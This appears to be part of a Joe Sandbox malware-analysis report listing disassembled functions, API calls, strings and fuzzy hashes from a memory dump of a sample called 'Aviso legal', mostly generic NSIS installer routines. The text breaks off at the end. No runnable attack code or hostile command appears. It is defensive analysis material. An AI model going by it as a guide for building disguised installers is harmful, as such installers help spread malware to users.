String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58

Function 00403F9A Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
ShowWindow.USER32(?), ref: 00403FF6
GetWindowLongW.USER32(?,?), ref: 00404008
ShowWindow.USER32(?,?), ref: 00404021
DestroyWindow.USER32 ref: 00404035
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
GetDlgItem.USER32(?,?), ref: 0040406D
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
IsWindowEnabled.USER32(00000000), ref: 00404088
GetDlgItem.USER32(?,00000001), ref: 00404133
GetDlgItem.USER32(?,00000002), ref: 0040413D
SetClassLongW.USER32(?,000000F2,?), ref: 00404157
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
GetDlgItem.USER32(?,00000003), ref: 0040424E
ShowWindow.USER32(00000000,?), ref: 0040426F
EnableWindow.USER32(?,?), ref: 00404281
EnableWindow.USER32(?,?), ref: 0040429C
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
EnableMenuItem.USER32(00000000), ref: 004042B9
SendMessageW.USER32(?,?,00000000,00000001), ref: 004042D1
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
SetWindowTextW.USER32(?,0042D268), ref: 00404322
ShowWindow.USER32(?,0000000A), ref: 00404456

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 1860320154-0
Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D

Function 00403BEC Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,?,?,0040363D,0000000B), ref: 0040691C
Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937

lstrcatW.KERNEL32(00442000,0042D268), ref: 00403C6D
lstrlenW.KERNEL32(00432EA0,?,?,?,00432EA0,00000000,00440800,00442000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75E03420), ref: 00403CED
lstrcmpiW.KERNEL32(00432E98,.exe,00432EA0,?,?,?,00432EA0,00000000,00440800,00442000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
GetFileAttributesW.KERNEL32(00432EA0,?,00000000,?), ref: 00403D0B
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00440800), ref: 00403D54

Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491

RegisterClassW.USER32(00433EA0), ref: 00403D91
SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403DA9
CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
RegisterClassW.USER32(00433EA0), ref: 00403E56
DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75

Strings

_Nb, xrefs: 00403D70, 00403DD8
RichEd32, xrefs: 00403E28
.DEFAULT\Control Panel\International, xrefs: 00403C58
RichEdit, xrefs: 00403E47
RichEdit20W, xrefs: 00403E38, 00403E3E
.exe, xrefs: 00403CFA
RichEd20, xrefs: 00403E1A
Control Panel\Desktop\ResourceLocale, xrefs: 00403C20

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1115850852
Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D

Function 00404658 Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
GetDlgItem.USER32(?,000003E8), ref: 0040470A
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
GetSysColor.USER32(?), ref: 00404738
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
lstrlenW.KERNEL32(?), ref: 00404759
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
GetDlgItem.USER32(?,0000040A), ref: 004047D4
SendMessageW.USER32(00000000), ref: 004047DB
GetDlgItem.USER32(?,000003E8), ref: 00404806
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
LoadCursorW.USER32(00000000,00007F02), ref: 00404857
SetCursor.USER32(00000000), ref: 0040485A
LoadCursorW.USER32(00000000,00007F00), ref: 00404873
SetCursor.USER32(00000000), ref: 00404876
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
SendMessageW.USER32(?,00000000,00000000), ref: 004048B7

Strings

N, xrefs: 004047F4

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N
API String ID: 3103080414-1130791706
Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4

Function 00406183 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7

Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4

GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
wsprintfA.USER32 ref: 00406202
GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,?,00431108,?,?,?,?,?), ref: 0040623D
GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 0040624C
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
GlobalFree.KERNEL32(00000000), ref: 004062EB
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2

Part of subcall function 0040602D: GetFileAttributesW.KERNEL32(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
Part of subcall function 0040602D: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

Strings

[Rename], xrefs: 0040626C, 0040627E
%ls=%ls, xrefs: 004061F8

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 5499eb560c731fe365026282fea1d403a64bc5aecd0ea22a231c31d407be1798
Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
Opcode Fuzzy Hash: 5499eb560c731fe365026282fea1d403a64bc5aecd0ea22a231c31d407be1798
Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D

Function 0040498A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004049D9
SetWindowTextW.USER32(00000000,?), ref: 00404A03
SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
CoTaskMemFree.OLE32(00000000), ref: 00404ABF
lstrcmpiW.KERNEL32(00432EA0,0042D268,00000000,?,?), ref: 00404AF1
lstrcatW.KERNEL32(?,00432EA0), ref: 00404AFD
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B0F

Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94

Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75E03420,00442800,?,00403508,00442800,00442800,00403810), ref: 00406827
Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,00442800,00442800,00403810), ref: 00406836
Part of subcall function 004067C4: CharNextW.USER32(?,00000000,75E03420,00442800,?,00403508,00442800,00442800,00403810), ref: 0040683B
Part of subcall function 004067C4: CharPrevW.USER32(?,?,75E03420,00442800,?,00403508,00442800,00442800,00403810), ref: 0040684E

GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED

Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03

Strings

A, xrefs: 00404AAD

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A
API String ID: 2624150263-3554254475
Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D

Function 0040307D Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 181memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040308E
GetModuleFileNameW.KERNEL32(00000000,00443800,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA

Part of subcall function 0040602D: GetFileAttributesW.KERNEL32(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
Part of subcall function 0040602D: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,00441800,00441800,00443800,00443800,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
GlobalAlloc.KERNEL32(?,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C

Strings

soft, xrefs: 0040316B
Null, xrefs: 00403174
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
}8@, xrefs: 00403227, 00403242
Error launching installer, xrefs: 004030CD
Inst, xrefs: 00403162

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
API String ID: 2803837635-2852043193
Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D

Function 0040657A Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 196stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(00432EA0,00000400), ref: 00406695
GetWindowsDirectoryW.KERNEL32(00432EA0,00000400,00000000,0042C248,?,004055D6,0042C248,00000000,00000000,?,75E023A0), ref: 004066A8
lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406719
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406663

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-730719616
Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D

Function 004032B4 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040331E
GetTickCount.KERNEL32 ref: 004033C5
MulDiv.KERNEL32(7FFFFFFF,?,?), ref: 004033EE
wsprintfW.USER32 ref: 00403401

Strings

*B, xrefs: 004032DF
A, xrefs: 00403374
}8@, xrefs: 004032B4
... %d%%, xrefs: 004033FB
A, xrefs: 0040347E

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: *B$ A$ A$... %d%%$}8@
API String ID: 551687249-3029848762
Opcode ID: 005ae27f7b2a8b60ff4b8ab7505c874ce6cd52d3df2a7fc9a0352d90757565bf
Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
Opcode Fuzzy Hash: 005ae27f7b2a8b60ff4b8ab7505c874ce6cd52d3df2a7fc9a0352d90757565bf
Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9

Function 00404500 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

